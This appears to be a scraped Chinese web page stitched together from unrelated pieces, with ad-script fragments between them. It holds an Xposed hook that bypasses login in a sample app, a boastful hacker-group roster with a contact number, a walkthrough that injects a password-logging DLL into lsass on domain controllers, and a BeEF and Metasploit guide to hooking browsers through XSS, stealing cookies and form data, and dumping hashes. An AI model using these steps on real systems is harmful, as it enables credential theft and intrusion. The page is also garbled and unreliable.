谁知道那样的网站hook渗透小组 貌似很神秘的组织

使用渗透测试框架Xposed Framework hook调试Android APP
Xposed Framework 是一个很强大的渗透测试框架,本文中讲述如何用 Xposed Framework hook 一个Android APP中的一个方法并绕过登录验证。
Xposed Framework 原理简述
Xposed Framewrork 也使用了模块化的扩展模式,可以通过编写模块来满足不同的需求,比如有一个模块叫&3dot menu,可以在每一个 APP 界面中添加一个三点按钮,20MP sensor for Superior Auto&可以扩展 sony 相机,所有 Xposed Framework 能够实现的功能都是通过模块的方式实现的,这里提供了一些例子模块:example modules。
Zygote 是 Android 的核心,每打开一个 app,Zygote 就会 fork 一个虚拟机实例来运行 app,Xposed Framework 深入到了 Android 核心机制中,通过改造 Zygote 来实现一些很牛逼的功能。Zygote 的启动配置在/init.rc&脚本中,由系统启动的时候开启此进程,对应的执行文件是/system/bin/app_process,这个文件完成类库加载及一些函数调用的工作。
当系统中安装了 Xposed Framework 之后,会对&app_process 进行扩展,也就是说,Xposed Framework 会拿自己实现的 app_process&覆盖掉 Android 原生提供的&app_process 文件,当系统启动的时候,就会加载由 Xposed Framework 替换过的进程文件,并且,Xposed Framework 还定义了一个 jar 包,系统启动的时候,也会加载这个包:
/data/data/de.robv.android.xposed.installer/bin/XposedBridge.jar
1.Rooted Device / Emulator (已 root 的手机或者模拟器)
2.Xposed Installer (Xposed 安装程序)
3.Testing Android App
Xposed Framework 就是一个 apk 包,到后用下面的命令安装到手机上:
adb&install&&xposed-installer-you-just-downloaded&.apk
安装好之后,打开 Xposed ,下面是截图:
Modules 下面是一些可用的模块
实现一个模块
一个 Xposed 模块就是一个 Android app,不需要实现 Activity,本例中的 module 叫com.bypass.validation, 下面是这个实例的 AndroidManifest.xml 文件,注意其中定义了三项 meta-data:
1.Module name&
2.Module Description&
3.Module Minimum Version
&manifest xmlns:android=&/apk/res/android&
package=&com.bypass.validation&
android:versionCode=&1&
android:versionName=&1.0& &
&uses-sdk android:minSdkVersion=&15& android:targetSdkVersion=&15& /&
&application android:allowBackup=&true& android:icon=&@drawable/ic_launcher&
android:label=&@string/app_name& android:theme=&@style/AppTheme& &
&meta-data
android:name=&xposedmodule&
android:value=&true&/&
&meta-data
android:name=&xposeddescription&
android:value=&Hooking Module for Bypassing Validation& /&
&meta-data
android:name=&xposedminversion&
android:value=&30& /&&/application&&/manifest&
其中&xposedminversion 是指 XposedBridge library 的版本,需要将 Xposed Library 复制到 lib目录(注意是 lib 目录不是 libs 目录),然后将这个 jar 包添加到 Build PATH 中,jar 包可以在这里下载。
然后在 src 目录下面建立一个 java 文件,就叫 bypass.java 吧,并在 assets 目录中新建一个叫xposed_init 的文件,里面写上刚才建立的 java 文件的包路径,这样,我们的apk 就可以被识别为一个 Xposed 模块了
现在来看看要 hook 的 apk 包,要 hook,关键是要知道 hook 的点,即要明确要 hook 的函数名,实际使用中可以用 jeb 等反编译工具得到需要 hook 的函数名,我们这里就直接看样例 app 的吧:
从源码中可以看到,MainActivity 的验证逻辑很简单,只要用户输入的密码和定义的 password 相等,就可通过验证(checkLogin 方法)。
实现模块还要完成下面几个步骤
1.实现&IXposedHookLoadPackage接口
2.指定要 hook 的包名(这里是com.attify.vuln)
3.判断当前加载的包是否是指定的包(在接口方法中判断
4.指定要 hook 的方法名
5.实现beforeHookedMethod方法和afterHookedMethod方法(hook的具体功能)
&下图是模块的核心代码,上述各项都已经具备
这里的包名是com.attify.vuln,
if(lpparam.packageName.equals(&com.attify.vuln&))
上面这一行代码指定了只有当 com.attify.vuln 这个包加载的时候,才会触发一系列的 hook 行为,当这行为触发的时候,de.robv.android.xposed.XposedHelpers 类的 findAndHookMethod 方法就会被调用,并在适当的时候执行前置方法(beforeHookedMethod)和后置方法(afterHookedMethod),这里绕过验证方法只需要让传递到 checkLogin 方法的两个参数相等即可,so easy。当 checkLogin 方法被调用前调用我们实现的模块,并执行前置函数,就可以使得传递给 checkLogin 函数的两个参数相等。
把我们实现的模块安装到设备上,如下图:
勾选我们刚才安装的模块,并重启,等系统重启之后,打开样例 app,在输入密码的地方输入任意字符,因为我们实现的那个模块会执行
param.args[1]&=&param.args[0];
这行代码,所以输入任意密码都会通过验证,如下图
整个模块执行过程的log信息可以在Xposed log中查看到,如下图
由日志可以看到,hook 的关键代码(前置函数)执行前,checkLogin 方法的两个参数是不同的,而在后置函数执行的时候,两个参数已然相等了:)
(window.slotbydup=window.slotbydup || []).push({
id: '2467140',
container: s,
size: '1000,90',
display: 'inlay-fix'
(window.slotbydup=window.slotbydup || []).push({
id: '2467141',
container: s,
size: '1000,90',
display: 'inlay-fix'
(window.slotbydup=window.slotbydup || []).push({
id: '2467143',
container: s,
size: '1000,90',
display: 'inlay-fix'
(window.slotbydup=window.slotbydup || []).push({
id: '2467148',
container: s,
size: '1000,90',
display: 'inlay-fix'和谐渗透小组名单&中国著名黑客组织和谐渗透小组成员列表名单&IC002006-IC002018
乃和谐主创人物历史!80后黑客主创各种EXP利用漏洞入侵手法非常胜明
(毕业于北京北方网络IDC大学经济管理系会计学专业。参与过中美黑客大战,他的组织与红客联盟齐名。中国第三代黑客。)
& 此人乃八神关门子弟此人曾利用渗透技术 渗透国内各大官方网子
(内幕人都知道此人心狠手辣 )
修改过火鸟的bbs系统,对linux安全很有研究。入侵技术不在话下对脚本渗透数一无二的告诉在tsinghua的bbs和绿色兵团的irc中经常能碰到他,而且还很乐于助人。
原中国黑客联盟成员,擅长:计算机技术安全,编程,反编译和病毒测试编写软件与其代码分析。中国计算机学会计算安全专业委员会成员入侵渗透能者!
死神Bleach-黑蝎
inux,unix方面的高手。国内数一数二。熟悉linux下的缓冲区溢出以及利用。渗透国内无数安全论坛技术论坛与黑糖两人共度排名!
数据库及脚本高手。在很久以前就对跨站脚本及SQL注入很有研究了。《跨站脚本执行漏洞详解》,此人数据专家入侵各种网站拖库数据上达百万社工人肉信息定位数据!
ChinareD-黑火
主攻渗透入侵对服务器深挖各种EXP 入侵高手对于破防视而无视 在他眼里 没有神只有他是很自信的家伙~!
和谐核心八神老大QQ :4856955
总部交流QQ群号:
点击联系八神
已投稿到:
以上网友发言只代表其个人观点,不代表新浪网的观点或立场。域渗透――Hook PasswordChangeNotify浅析
在之前的文章中介绍了两种维持域控权限的方法&&SSP和Skeleton Key,这两种方法均需要借助Mimikatz来实现,或多或少存在一些不足,所以这次接着介绍一个更加隐蔽且不需要使用Mimikatz的后门方法&&Hook PasswordChangeNotify.
Hook PasswordChangeNotify这个概念最早是在日由clymb3r提出,通过Hook PasswordChangeNotify拦截修改的帐户密码。
需要了解的相关背景知识如下:
在修改域控密码时会进行如下同步操作:
a. 当修改域控密码时,LSA首先调用PasswordFileter来判断新密码是否符合密码复杂度要求 b. 如果符合,LSA接着调用PasswordChangeNotify在系统上同步更新密码
函数PasswordChangeNotify存在于rassfm.dll
rassfm.dll可理解为Remote Access Subauthentication dll,只存在于在Server系统下,xp、win7、win8等均不存在
可以使用dumpbin查看rassfm.dll导出函数来验证结论2:
#!bashdumpbin /exports c:\windows\system32\rassfm.dll
对于之前介绍过的Security Support Provider,在实际使用过程中不可避免的会有以下不足:
安装后需要重启系统需要在System32文件夹下放置dll需要修改注册表
而使用Hook PasswordChangeNotify却有如下优点:
不需要重启不需要修改注册表甚至不需要在系统放置dll
可以说在隐蔽性上,使用Hook PasswordChangeNotify优于Security Support Provider
0x03 技术实现
根据clymb3r提供的poc,实现Hook PasswordChangeNotify共包含两部分:
1、Hook dll
/clymb3r/Misc-Windows-Hacking
(1)为PasswordChangeNotify创建一个inline Hook,将初始函数重定向到PasswordChangeNotifyHook
(2)在PasswordChangeNotifyHook中实现记录密码的操作,然后重新将控制权交给PasswordChangeNotify
2、dll注入
可以利用 Powershell tricks中的Process Injection将我们自己编写的dll注入到lsass进程,实现Hook功能
0x04 实际测试
测试环境:
Server Server
测试步骤:
1、生成Hook dll
poc下载地址:
/clymb3r/Misc-Windows-Hacking
使用VS2015开发环境,MFC设置为在静态库中使用MFC
编译工程,生成HookPasswordChange.dll
2、生成dll注入的powershell脚本
下载Powershell的dll注入脚本
/clymb3r/PowerShell/blob/master/Invoke-ReflectivePEInjection/Invoke-ReflectivePEInjection.ps1
在代码尾部添加如下代码:
Invoke-ReflectivePEInjection -PEPath HookPasswordChange.dll &procname lsass
并命名为HookPasswordChangeNotify.ps1
3、Hook PasswordChangeNotify
上传HookPasswordChangeNotify.ps1和HookPasswordChange.dll
管理员权限执行:
#!bashPowerShell.exe -ExecutionPolicy Bypass -File HookPasswordChangeNotify.ps1
4、自动记录新密码
在Server 下,手动修改域控密码后
在C:\Windows\Temp下可以找到passwords.txt,其中记录了新修改的密码
在Server 下,同样成功
本文依旧是对常规功能做了演示,后续可自定义dll代码实现更多高级功能,如自动上传新密码。
以下链接中的代码可作为参考,其中实现了将获取的新密码上传至Http服务器
/2013/09/stealing-passwords-every-time-they.
使用Hook PasswordChangeNotify来记录新密码,如果放在以前,进程注入的操作很容易被检测,但是得益于Powershell应用的发展,通过Powershell来进程注入可以绕过常规的拦截。
当然,Hook PasswordChangeNotify仅仅是众多Hook方法中的一个。
我已经Fork了clymb3r的代码,并结合本文需要的代码做了更新,下载地址如下:
/3gstudent/Hook-PasswordChangeNotify
(window.slotbydup=window.slotbydup || []).push({
id: '2467140',
container: s,
size: '1000,90',
display: 'inlay-fix'
(window.slotbydup=window.slotbydup || []).push({
id: '2467141',
container: s,
size: '1000,90',
display: 'inlay-fix'
(window.slotbydup=window.slotbydup || []).push({
id: '2467143',
container: s,
size: '1000,90',
display: 'inlay-fix'
(window.slotbydup=window.slotbydup || []).push({
id: '2467148',
container: s,
size: '1000,90',
display: 'inlay-fix'和谐渗透小组是个怎么样的黑客组织?_百度知道网络安全(57)
0x01:科普 Beef目前欧美最流行的WEB框架攻击平台,全称:The Browser Exploitation Framework Project. Beef利用简单的XSS漏洞,通过一段编写好的JavaScript(hook.js)控制目标主机的浏览器,通过目标主机浏览器获得该主机的详细信息,并进一步扫描内网,配
Beef目前欧美最流行的WEB框架平台,全称:The Browser Exploitation Framework Project. Beef利用简单的XSS,通过一段编写好的JavaScript(hook.js)控制目标主机的浏览器,通过目标主机浏览器获得该主机的详细信息,并进一步扫描内网,配合metasploit绝对是内网渗透一大杀器。
Kali linux&默认未安装beef,需要自行安装。
apt-get&update
apt-get&install&beef-xss
0x03.1启动
/usr/share/beef-xss
cd&/usr/share/beef-xss
127.0.0.1:3000/ui/pannel
demos:Beef-Xss ip:3000/demos/butcher/index.html
测试两台主机网络通信是否正常:
访问Beef demo页面
demo页面嵌入了hook.js&访问-&中招
在正常页面添加script标签,嵌入恶意脚本
在实际渗透中(需要一个公网的IP),如何让受害者访问我们嵌有hook.js的页面呢?
网站反馈页面,举报页面案例:
当然,这位同学用的是Xss平台,而不是beef,利用Beef的话,不仅能得到后台管理员的Cookie,再配合Metasploit,还能以管理员主机浏览器当做跳板,进入公司内网。
Online Browersers-&右击-&Use As Proxy
再配合ARP攻击,MITM中间人攻击,对内网内所有Http请求重定向基本...(这里露出一个你懂的WS笑容)
Beef后台检测到有主机上线(感觉好像当年玩的灰鸽子、上兴 =。= 囧)
&通过浏览器,我们可以看到目标主机的很多信息:
浏览器信息:
Browser&UA&String
Browser&Platform
Windows&size
插件基本信息:
Quick&Time
操作系统信息
Date&时间日期
Cpu&(32/64)
屏幕分辨率
是否支持触屏
用火狐浏览器测试
Beef功能模块组件
常用功能/模块
Browser:获取浏览器信息
--Hooked&Domain
-----Get&Cookie&获取客户端Cookie信息&执行一次命令在右边显示Cookie;
-----Get&From&Value&获取页面提交的表单信息:截获填写的银行卡信息、注册页面的用户名密码;
-----Redirect&Browser&浏览器重定向
执行后,目标浏览器访问任何网站都将会被重定向到,实际渗透的时候在内网实施ARP攻击,将内网所有Http请求流量重定向到嵌入了Hook恶意脚本的页面...(在这里露出一个淫荡的笑容)
Chrome&Extensions:
Debug:测试Http请求
Exploits:利用浏览器漏洞进行攻击
Host:获取受害者主机信息
Mtasploit:结合Metasploit进行渗透,这个也是本文的重点。
Network:进行Doser、ping、DNS枚举、端口扫描等等
Social&Enhineering:社工模块
0x05与Metasploit联动
Beef配置文件
/usr/share/beef-xss/config.yaml&&
&&metasploit:
enable:&false
metasploit:
enable:&true
vim&/usr/share/beef-xss/config.yaml
#&Copyright&(c)&&Wade&Alcorn&-&
#&Browser&Exploitation&Framework&(BeEF)&-&
#&See&the&file&'doc/COPYING'&for&copying&permission
#&BeEF&Configuration&file
&&&&version:&'0.4.4.5-alpha'
&&&&debug:&false
&&&&restrictions:
&&&&&&&&#&subnet&of&browser&ip&addresses&that&can&hook&to&the&framework
&&&&&&&&permitted_hooking_subnet:&&0.0.0.0/0&
&&&&&&&&#&subnet&of&browser&ip&addresses&that&can&connect&to&the&UI
&&&&&&&&#&permitted_ui_subnet:&&127.0.0.1/32&
&&&&&&&&permitted_ui_subnet:&&0.0.0.0/0&
&&&&&&&&debug:&false&#Thin::Logging.debug,&very&verbose.&Prints&also&full&exception&stack&trace.
&&&&&&&&host:&&0.0.0.0&
&&&&&&&&port:&&3000&
&&&&&&&&#&Decrease&this&setting&up&to&1000&if&you&want&more&responsiveness&when&sending&modules&and&retrieving&results.
&&&&&&&&#&It's&not&advised&to&decrease&it&with&tons&of&hooked&browsers&(more&than&50),
&&&&&&&&#&because&it&might&impact&performance.&Also,&enable&WebSockets&is&generally&better.
&&&&&&&&xhr_poll_timeout:&5000
&&&&&&&&#&if&running&behind&a&nat&set&the&public&ip&address&here
&&&&&&&&#public:&&&
&&&&&&&&#public_port:&&&&#&port&setting&is&experimental
&&&&&&&&#&DNS
&&&&&&&&dns_host:&&localhost&
&&&&&&&&dns_port:&53
&&&&&&&&panel_path:&&/ui/panel&
&&&&&&&&hook_file:&&/hook.js&
&&&&&&&&hook_session_name:&&BEEFHOOK&
&&&&&&&&session_cookie_name:&&BEEFSESSION&
&&&&&&&&#&Allow&one&or&multiple&domains&to&access&the&RESTful&API&using&CORS
&&&&&&&&#&For&multiple&domains&use:&&,&&
&&&&&&&&restful_api:
&&&&&&&&&&&&allow_cors:&false
&&&&&&&&&&&&cors_allowed_domains:&&&
&&&&&&&&#&Prefer&WebSockets&over&XHR-polling&when&possible.
&&&&&&&&websocket:
&&&&&&&&&&enable:&false
&&&&&&&&&&secure:&true&#&use&WebSocketSecure&work&only&on&https&domain&and&whit&https&support&enabled&in&BeEF
&&&&&&&&&&port:&61985&#&WS:&good&success&rate&through&proxies
&&&&&&&&&&secure_port:&61986&#&WSSecure
&&&&&&&&&&ws_poll_timeout:&1000&#&poll&BeEF&every&second
&&&&&&&&#&Imitate&a&specified&web&server&(default&root&page,&404&default&error&page,&'Server'&HTTP&response&header)
&&&&&&&&web_server_imitation:
&&&&&&&&&&&&enable:&true
&&&&&&&&&&&&type:&&apache&&#supported:&apache,&iis
&&&&&&&&#&Experimental&HTTPS&support&for&the&hook&/&admin&/&all&other&Thin&managed&web&services
&&&&&&&&https:
&&&&&&&&&&&&enable:&false
&&&&&&&&&&&&#&In&production&environments,&be&sure&to&use&a&valid&certificate&signed&for&the&value
&&&&&&&&&&&&#&used&in&beef.http.dns_host&(the&domain&name&of&the&server&where&you&run&BeEF)
&&&&&&&&&&&&key:&&beef_key.pem&
&&&&&&&&&&&&cert:&&beef_cert.pem&
&&&&database:
&&&&&&&&#&For&information&on&using&other&databases&please&read&the
&&&&&&&&#&README.databases&file
&&&&&&&&#&supported&DBs:&sqlite,&mysql,&postgres
&&&&&&&&#&NOTE:&you&must&change&the&Gemfile&adding&a&gem&require&line&like:
&&&&&&&&#&&&gem&&dm-postgres-adapter&
&&&&&&&&#&or
&&&&&&&&#&&&gem&&dm-mysql-adapter&
&&&&&&&&#&if&you&want&to&switch&drivers&from&sqlite&to&postgres&(or&mysql).
&&&&&&&&#&Finally,&run&a&'bundle&install'&command&and&start&BeEF.
&&&&&&&&driver:&&sqlite&
&&&&&&&&#&db_file&is&only&used&for&sqlite
&&&&&&&&db_file:&&db/beef.db&
&&&&&&&&#&db&connection&information&is&only&used&for&mysql/postgres
&&&&&&&&db_host:&&localhost&
&&&&&&&&db_port:&5432
&&&&&&&&db_name:&&beef&
&&&&&&&&db_user:&&beef&
&&&&&&&&db_passwd:&&beef123&
&&&&&&&&db_encoding:&&UTF-8&
&&&&#&Credentials&to&authenticate&in&BeEF.&Used&by&both&the&RESTful&API&and&the&Admin_UI&extension
&&&&credentials:
&&&&&&&&user:&&&&beef&
&&&&&&&&passwd:&&beef&
&&&&#&Autorun&modules&as&soon&the&browser&is&hooked.
&&&&#&NOTE:&only&modules&with&target&type&'working'&or&'user_notify'&can&be&run&automatically.
&&&&autorun:
&&&&&&&&enable:&true
&&&&&&&&#&set&this&to&FALSE&if&you&don't&want&to&allow&auto-run&execution&for&modules&with&target-&user_notify
&&&&&&&&allow_user_notify:&true
&&&&crypto_default_value_length:&80
&&&&#&Enable&client-side&debugging
&&&&client:
&&&&&&&&debug:&false
&&&&#&You&may&override&default&extension&configuration&parameters&here
&&&&extension:
&&&&&&&&requester:
&&&&&&&&&&&&enable:&true
&&&&&&&&proxy:
&&&&&&&&&&&&enable:&true
&&&&&&&&metasploit:
&&&&&&&&&&&&enable:&true
&&&&&&&&social_engineering:
&&&&&&&&&&&&enable:&true
&&&&&&&&evasion:
&&&&&&&&&&&&enable:&false
&&&&&&&&console:
&&&&&&&&&&&&&shell:
&&&&&&&&&&&&&&&&enable:&false
&&&&&&&&ipec:
&&&&&&&&&&&&enable:&true
vim&/usr/share/beef-xss/extensions/metasploit/config.yaml
#&Copyright&(c)&&Wade&Alcorn&-&
#&Browser&Exploitation&Framework&(BeEF)&-&
#&See&the&file&'doc/COPYING'&for&copying&permission
#&Enable&MSF&by&changing&extension:metasploit:enable&to&true
#&Then&set&msf_callback_host&to&be&the&public&IP&of&your&MSF&server
#&Ensure&you&load&the&xmlrpc&interface&in&Metasploit
#&msf&&&load&msgrpc&ServerHost=10.211.55.2&Pass=abc123&ServerType=Web
#&Please&note&that&the&ServerHost&parameter&must&have&the&same&value&of&host&and&callback_host&variables&here&below.
#&Also&always&use&the&IP&of&your&machine&where&MSF&is&listening.
&&&&extension:
&&&&&&&&metasploit:
&&&&&&&&&&&&name:&'Metasploit'
&&&&&&&&&&&&enable:&true
&&&&&&&&&&&&host:&&172.16.244.129&
&&&&&&&&&&&&port:&55552
&&&&&&&&&&&&user:&&msf&
&&&&&&&&&&&&pass:&&abc123&
&&&&&&&&&&&&uri:&'/api'
&&&&&&&&&&&&ssl:&false
&&&&&&&&&&&&ssl_version:&'SSLv3'
&&&&&&&&&&&&ssl_verify:&true
&&&&&&&&&&&&callback_host:&&172.16.244.129&
&&&&&&&&&&&&autopwn_url:&&autopwn&
&&&&&&&&&&&&auto_msfrpcd:&false
&&&&&&&&&&&&auto_msfrpcd_timeout:&120
&&&&&&&&&&&&msf_path:&[&
&&&&&&&&&&&&&&{os:&'osx',&path:&'/opt/local/msf/'},
&&&&&&&&&&&&&&{os:&'livecd',&path:&'/opt/metasploit-framework/'},
&&&&&&&&&&&&&&{os:&'bt5r3',&path:&'/opt/metasploit/msf3/'},
&&&&&&&&&&&&&&{os:&'bt5',&path:&'/opt/framework3/msf3/'},
&&&&&&&&&&&&&&{os:&'backbox',&path:&'/opt/metasploit3/msf3/'},
&&&&&&&&&&&&&&{os:&'win',&path:&'c:\\metasploit-framework\\'},
&&&&&&&&&&&&&&{os:&'custom',&path:&'/usr/share/metasploit-framework/'}
&&&&&&&&&&&&]
{os:&'custom',&path:&''}
{os:&'custom',&path:&'/usr/share/metasploit-framework/'}
修改 host callback_host两参数,改为beef主机IP
重启postgresq、metasploit、服务
service&postgresql&restart&&&service&metasploit&restart
msfconsole&#启动Metasploit
load&msgrpc&ServerHost=172.16.244.129&Pass=abc123
启动beef这里提示已经载入246个metasploit的EXP,MSF更新到最新版应该有五六百个EXP
进入Beef后台(莫名成了245 =。=!)
use&exploit/windows/browser/ie_execcommand_uaf
show&options
set&srvhost&172.16.244.129
exploit/run
靶机被强行跳转到被监听的URL
MSF成功监听到(但,貌似是虚拟机装的XP把这个漏洞补了,所以没产生session会话)
如果XP没有打补丁,即存在这个EXP针对的漏洞,这里会产生一个session会话
session&-i&1
screenshot 截屏:截取遭钓鱼主机的屏幕到本地文件
sysinfo 查看系统信息
hashdump dump目标主机的用户Hash
0x06更多Meterpreter的命令
参考知识库
* 以上用户言论只代表其个人观点,不代表CSDN网站的观点或立场
访问:213471次
积分:1989
积分:1989
排名:第14104名
转载:204篇
评论:30条
(2)(1)(7)(13)(14)(9)(3)(11)(7)(1)(20)(70)(31)(3)(10)(14)

我要回帖

更多关于 谁知道那样的网站 的文章

 

随机推荐